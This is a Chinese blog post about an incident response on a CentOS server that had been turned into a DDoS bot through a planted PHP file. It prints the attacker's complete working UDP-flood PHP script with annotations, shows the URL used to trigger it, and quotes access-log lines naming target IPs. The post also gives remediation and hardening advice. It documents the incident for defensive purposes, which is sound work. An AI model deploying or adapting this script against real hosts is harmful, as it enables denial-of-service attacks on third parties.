记一次Centos服务器被挂马的抓马经历
<p>今天早上五点,收到监控宝的警告短信,说是网站M无法访问了。睡的正香,再说网站所在系统是centos,重要数据每天都备份,应该很安全,也没有在意。倒头接着睡觉去了。</p>
<p>
早上九点,机房负责人直接给我打来电话,说是全机房网络巨慢,单位的所有网站都打不开或打开的很慢。Centos服务器被挂马的一次抓马经历。</p>
<p>
我赶紧赶了过去,查看了一下那里网络,发现175服务总是以50M/S速度向外发包,而175服务器正是网站M所在的服务器。</p>
<p>
果断SSH连接175服务器,发现175服务器连接也很慢,连上之后top一下,查看cpu负载:</p>
<p>
top</p>
<p>
发现有两个apache进程占用cpu一直在40%以上,马上停止httpd 服务</p>
<div class="jb51code">
<div>
<div class="syntaxhighlighterps" id="highlighter_125448">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="ps plain">service httpd stop</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
停止httpd服务之后,再看网络状态,175服务器也不向外发包了,一切正常。</p>
<p>
由此判断应该是175服务器挂了马,疯狂向外发包,挤占了全部机房带宽。</p>
<p>
<span><strong>下一步就是抓马了!</strong></span></p>
<p>
175服务器是有硬件防火墙,只开http80跟ssh22端口,ssh不太可能被盗号,应该是通过web漏洞挂马。早上5点才中招的,木马程序文件应该在1天之内。</p>
<p>
切到M站点根目录之下,查找最近一天内变动的文件,执行</p>
<div class="jb51code">
<div>
<div class="syntaxhighlighterps" id="highlighter_643876">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="ps plain">find ./ </code><code class="ps keyword">-mtime</code> <code class="ps plain">-1</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
果然,一个名为phzLtoxn.php的可疑文件出现在目录列表中。查看一下木马程序的创建者,执行</p>
<div class="jb51code">
<div>
<div class="syntaxhighlighterps" id="highlighter_410633">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="ps keyword">ls</code> <code class="ps keyword">-l</code> <code class="ps plain">phzLtoxn.php</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
这里发现文件就没了,难道这文件还会自我销毁?Centos服务器被挂马的一次抓马经历</p>
<p>
原来发生了一个小插曲,隔壁的管理员小黄也注意到这个文件,二话不说就删除了。我过去劈头批评教育了小黄一顿。见了木马程序就知道删删删删!难道木马程序不会再生成啊?你得顺藤摸瓜,不是一刀切。你得找到漏洞源头!删了没办法,再把httpd服务开启了,引狼入室,等等看能否再生成。</p>
<p>
果然,半小时不到,新的phzLtoxn.PHP文件又生成了。查看了一下,文件创建者是apache,由此判断这肯定是通过网站漏洞上传的。</p>
<p>
分析一下木马文件,看下黑客意图</p>
<p>
这里贴出phzLtoxn.php文件源代码,并作了简单注释,仅作学习之用。</p>
<div class="jb51code">
<div>
<div class="syntaxhighlighterps" id="highlighter_953451">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
<div class="line number19 index18 alt2">
19</div>
<div class="line number20 index19 alt1">
20</div>
<div class="line number21 index20 alt2">
21</div>
<div class="line number22 index21 alt1">
22</div>
<div class="line number23 index22 alt2">
23</div>
<div class="line number24 index23 alt1">
24</div>
<div class="line number25 index24 alt2">
25</div>
<div class="line number26 index25 alt1">
26</div>
<div class="line number27 index26 alt2">
27</div>
<div class="line number28 index27 alt1">
28</div>
<div class="line number29 index28 alt2">
29</div>
<div class="line number30 index29 alt1">
30</div>
<div class="line number31 index30 alt2">
31</div>
<div class="line number32 index31 alt1">
32</div>
<div class="line number33 index32 alt2">
33</div>
<div class="line number34 index33 alt1">
34</div>
<div class="line number35 index34 alt2">
35</div>
<div class="line number36 index35 alt1">
36</div>
<div class="line number37 index36 alt2">
37</div>
<div class="line number38 index37 alt1">
38</div>
<div class="line number39 index38 alt2">
39</div>
<div class="line number40 index39 alt1">
40</div>
<div class="line number41 index40 alt2">
41</div>
<div class="line number42 index41 alt1">
42</div>
<div class="line number43 index42 alt2">
43</div>
<div class="line number44 index43 alt1">
44</div>
<div class="line number45 index44 alt2">
45</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="ps plain"><?php</code>
</div>
<div class="line number2 index1 alt1">
<code class="ps plain">//设置脚本运行时间</code>
</div>
<div class="line number3 index2 alt2">
<code class="ps plain">set_time_limit(999999);</code>
</div>
<div class="line number4 index3 alt1">
<code class="ps plain">//攻击目标服务器ip</code>
</div>
<div class="line number5 index4 alt2">
<code class="ps value">$host</code> <code class="ps plain">= $_GET[</code><code class="ps string">'host'</code><code class="ps plain">];</code>
</div>
<div class="line number6 index5 alt1">
<code class="ps plain">//攻击目标服务器端口</code>
</div>
<div class="line number7 index6 alt2">
<code class="ps value">$port</code> <code class="ps plain">= $_GET[</code><code class="ps string">'port'</code><code class="ps plain">];</code>
</div>
<div class="line number8 index7 alt1">
<code class="ps plain">//攻击时长</code>
</div>
<div class="line number9 index8 alt2">
<code class="ps plain">$exec_time = $_GET[</code><code class="ps string">'time'</code><code class="ps plain">];</code>
</div>
<div class="line number10 index9 alt1">
<code class="ps plain">//每次发送字节数</code>
</div>
<div class="line number11 index10 alt2">
<code class="ps value">$Sendlen</code> <code class="ps plain">= 65535;</code>
</div>
<div class="line number12 index11 alt1">
<code class="ps value">$packets</code> <code class="ps plain">= 0;</code>
</div>
<div class="line number13 index12 alt2">
<code class="ps plain">//设置客户机断开不终止脚本的执行</code>
</div>
<div class="line number14 index13 alt1">
<code class="ps plain">ignore_user_abort(TRUE);</code>
</div>
<div class="line number15 index14 alt2">
<code class="ps plain">//step1. 目标服务器</code><code class="ps value">$host</code><code class="ps plain">、端口</code><code class="ps value">$port</code><code class="ps plain">、运行时长$exec_time有效性</code>
</div>
<div class="line number16 index15 alt1">
<code class="ps plain">if (StrLen(</code><code class="ps value">$host</code><code class="ps plain">) == 0 or StrLen(</code><code class="ps value">$port</code><code class="ps plain">) == 0 or StrLen($exec_time) == 0) { </code>
</div>
<div class="line number17 index16 alt2">
<code class="ps spaces"> </code><code class="ps plain">if (StrLen($_GET[</code><code class="ps string">'rat'</code><code class="ps plain">]) <> 0) { </code>
</div>
<div class="line number18 index17 alt1">
<code class="ps spaces"> </code><code class="ps keyword">echo</code> <code class="ps plain">$_GET[</code><code class="ps string">'rat'</code><code class="ps plain">] . $_SERVER[</code><code class="ps string">"HTTP_HOST"</code><code class="ps plain">] . </code><code class="ps string">"|"</code> <code class="ps plain">. GetHostByName($_SERVER[</code><code class="ps string">'SERVER_NAME'</code><code class="ps plain">]) . </code><code class="ps string">"|"</code> <code class="ps plain">. php_uname() . </code><code class="ps string">"|"</code> <code class="ps plain">. $_SERVER[</code><code class="ps string">'SERVER_software'</code><code class="ps plain">] . $_GET[</code><code class="ps string">'rat'</code><code class="ps plain">]; </code>
</div>
<div class="line number19 index18 alt2">
<code class="ps spaces"> </code><code class="ps plain">exit; </code>
</div>
<div class="line number20 index19 alt1">
<code class="ps spaces"> </code><code class="ps plain">} </code>
</div>
<div class="line number21 index20 alt2">
<code class="ps spaces"> </code><code class="ps keyword">echo</code> <code class="ps string">"Warning to: opening"</code><code class="ps plain">; </code>
</div>
<div class="line number22 index21 alt1">
<code class="ps spaces"> </code><code class="ps plain">exit;</code>
</div>
<div class="line number23 index22 alt2">
<code class="ps plain">}</code>
</div>
<div class="line number24 index23 alt1">
<code class="ps plain">//step2. 设定发字符串</code><code class="ps value">$out</code><code class="ps plain">,这里是“AAAAAAAAAA...”</code>
</div>
<div class="line number25 index24 alt2">
<code class="ps plain">for (</code><code class="ps value">$i</code> <code class="ps plain">= 0; </code><code class="ps value">$i</code> <code class="ps plain">< </code><code class="ps value">$Sendlen</code><code class="ps plain">; </code><code class="ps value">$i</code><code class="ps plain">++) { </code>
</div>
<div class="line number26 index25 alt1">
<code class="ps spaces"> </code><code class="ps value">$out</code> <code class="ps plain">.= </code><code class="ps string">"A"</code><code class="ps plain">;</code>
</div>
<div class="line number27 index26 alt2">
<code class="ps plain">}</code>
</div>
<div class="line number28 index27 alt1">
<code class="ps plain">$max_time = time() + $exec_time;</code>
</div>
<div class="line number29 index28 alt2">
<code class="ps plain">//step3. 进行攻击,使用udp向目标服务器狠狠发串串</code>
</div>
<div class="line number30 index29 alt1">
<code class="ps plain">while (1) { </code>
</div>
<div class="line number31 index30 alt2">
<code class="ps spaces"> </code><code class="ps value">$packets</code><code class="ps plain">++; </code>
</div>
<div class="line number32 index31 alt1">
<code class="ps spaces"> </code><code class="ps plain">if (time() > $max_time) { </code>
</div>
<div class="line number33 index32 alt2">
<code class="ps spaces"> </code><code class="ps plain">break; </code>
</div>
<div class="line number34 index33 alt1">
<code class="ps spaces"> </code><code class="ps plain">} </code>
</div>
<div class="line number35 index34 alt2">
<code class="ps spaces"> </code><code class="ps value">$fp</code> <code class="ps plain">= fsockopen(</code><code class="ps string">"udp://$host"</code><code class="ps plain">, </code><code class="ps value">$port</code><code class="ps plain">, </code><code class="ps value">$errno</code><code class="ps plain">, </code><code class="ps value">$errstr</code><code class="ps plain">, 5); </code>
</div>
<div class="line number36 index35 alt1">
<code class="ps spaces"> </code><code class="ps plain">if (</code><code class="ps value">$fp</code><code class="ps plain">) { </code>
</div>
<div class="line number37 index36 alt2">
<code class="ps spaces"> </code><code class="ps plain">fwrite(</code><code class="ps value">$fp</code><code class="ps plain">, </code><code class="ps value">$out</code><code class="ps plain">); </code>
</div>
<div class="line number38 index37 alt1">
<code class="ps spaces"> </code><code class="ps plain">fclose(</code><code class="ps value">$fp</code><code class="ps plain">); </code>
</div>
<div class="line number39 index38 alt2">
<code class="ps spaces"> </code><code class="ps plain">}</code>
</div>
<div class="line number40 index39 alt1">
<code class="ps plain">}</code>
</div>
<div class="line number41 index40 alt2">
<code class="ps plain">//step4. 攻击统计</code>
</div>
<div class="line number42 index41 alt1">
<code class="ps keyword">echo</code> <code class="ps string">"Send Host $host:$port<br><br>"</code><code class="ps plain">;</code>
</div>
<div class="line number43 index42 alt2">
<code class="ps keyword">echo</code> <code class="ps string">"Send Flow $packets * ($Sendlen/1024="</code> <code class="ps plain">. round(</code><code class="ps value">$Sendlen</code> <code class="ps plain">/ 1024, 2) . </code><code class="ps string">")kb / 1024 = "</code> <code class="ps plain">. round(</code><code class="ps value">$packets</code> <code class="ps plain">* </code><code class="ps value">$Sendlen</code> <code class="ps plain">/ 1024 / 1024, 2) . </code><code class="ps string">" mb<br><br>"</code><code class="ps plain">;</code>
</div>
<div class="line number44 index43 alt1">
<code class="ps keyword">echo</code> <code class="ps string">"Send Rate "</code> <code class="ps plain">. round(</code><code class="ps value">$packets</code> <code class="ps plain">/ $exec_time, 2) . </code><code class="ps string">" packs/s"</code> <code class="ps plain">. round(</code><code class="ps value">$packets</code> <code class="ps plain">/ $exec_time * </code><code class="ps value">$Sendlen</code> <code class="ps plain">/ 1024 / 1024, 2) . </code><code class="ps string">" mb/s"</code><code class="ps plain">;</code>
</div>
<div class="line number45 index44 alt2">
<code class="ps plain">?></code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
从以上代码可以看出,是个典型的ddos攻击代码。黑客应该是把我们服务器当傀儡使用,组织大量傀儡服务器疯狂向目标服务器发包。黑客只需要打开浏览器,敲入http://M站域名.com//phzLtoxn.php?host=x.x.x.x&port=xx&time=xx就可以对目标服务器进行ddos攻击了。</p>
<p>
查看httpd日志,分析下攻击ip源,执行</p>
<div class="jb51code">
<div>
<div class="syntaxhighlighterps" id="highlighter_740638">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="ps plain">tail /var/log/httpd/access.log | grep phzLtonxn.php</code>
</div>
<div class="line number2 index1 alt1">
<code class="ps plain">183.12.75.240 - - </code><code class="ps string">"GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1"</code> <code class="ps plain">404 290 </code><code class="ps string">"-"</code> <code class="ps string">"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"</code><code class="ps plain">110.185.121.167 - - </code><code class="ps string">"GET /phzLtoxn.php?host=218.93.248.98&port=80&time=60 HTTP/1.1"</code> <code class="ps plain">404 290 </code><code class="ps string">"-"</code> <code class="ps string">"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"</code><code class="ps plain">110.185.121.167 - - </code><code class="ps string">"GET /phzLtoxn.php?host=198.148.89.34&port=80&time=60 HTTP/1.1"</code> <code class="ps plain">404 290 </code><code class="ps string">"-"</code> <code class="ps string">"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"</code><code class="ps plain">110.185.121.167 - - </code><code class="ps string">"GET /phzLtoxn.php?host=199.119.207.133&port=80&time=60 HTTP/1.1"</code> <code class="ps plain">404 290 </code><code class="ps string">"-"</code> <code class="ps string">"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"</code><code class="ps plain">110.185.121.167 - - </code><code class="ps string">"GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1"</code> <code class="ps plain">404 290 </code><code class="ps string">"-"</code> <code class="ps string">"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"</code><code class="ps plain">118.161.219.152 - - </code><code class="ps string">"GET /phzLtoxn.php?host=198.148.89.34&port=80&time=60 HTTP/1.1"</code> <code class="ps plain">404 290 </code><code class="ps string">"-"</code> <code class="ps string">"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"</code><code class="ps plain">118.161.219.152 - - </code><code class="ps string">"GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1"</code> <code class="ps plain">404 290 </code><code class="ps string">"-"</code> <code class="ps string">"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"</code><code class="ps plain">118.161.219.152 - - </code><code class="ps string">"GET /phzLtoxn.php?host=199.119.207.133&port=80&time=60 HTTP/1.1"</code> <code class="ps plain">404 290 </code><code class="ps string">"-"</code> <code class="ps string">"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"</code><code class="ps plain">118.161.219.152 - - </code><code class="ps string">"GET /phzLtoxn.php?host=218.93.248.98&port=80&time=60 HTTP/1.1"</code> <code class="ps plain">404 290 </code><code class="ps string">"-"</code> <code class="ps string">"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"</code><code class="ps plain">118.161.219.152 - - </code><code class="ps string">"GET /phzLtoxn.php?host=61.164.148.49&port=80&time=60 HTTP/1.1"</code> <code class="ps plain">404 290 </code><code class="ps string">"-"</code> <code class="ps string">"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
发现源ip来自多个,目标服务器ip也有多个,都属于很多国家,有点奇怪啊,为什么黑客有针对性的攻击呢,无聊的黑客啊。<br>
下一步,找漏洞!</p>
<p>
1、重新审视了M站目录下文件权限。仅对几个必要的缓存、静态化的目录为apache开启了写权限,防止phzLtoxn.php文件再次生成。</p>
<p>
2、重新开启httpd服务,使用360网站检测 http://webscan.360.cn/ 对H站进行漏洞检测,发现H站中有严重的远程执行漏洞,于是赶紧打了补丁。</p>
<p>
3、补丁打好之后,顺便修改了系统用户、数据库用户、ftp用户的密码、M站系统用户密码。</p>
<p>
观察几日之后,一切正常。</p>
<p>
<span><strong>小结一下几个安全原则</strong></span></p>
<p>
1、权限最小化。</p>
<p>
web目录一定做好权限,仅仅对apache开几个必要文件夹的写权限。</p>
<p>
2、时刻注意补丁更新。</p>
<p>
经常使用第三方的网站安全检测工具,如http://webscan.360.cn,也可参考十大安全评估工具,如果网站系统使用了第三方常用程序,多注意一下乌云漏洞平台的信息http://www.wooyun.org/。<br>
3、中招后一定要补牢。</p>
<p>
别光删删删删,要查找中招源头,分析黑客目的。</p>
<p>
这是还是请大牛小牛们分析一下,为什么这帮黑客用那么多的肉鸡来ddos攻击不同的服务器,而这些被ddos攻击的服务器之间却没有什么联系。为什么攻击没有针对性?难道是为了耗带宽玩?!</p>
<p>
原文链接:http://blog.csdn.net/qq_21439971/article/details/54631440</p>
頁:
[1]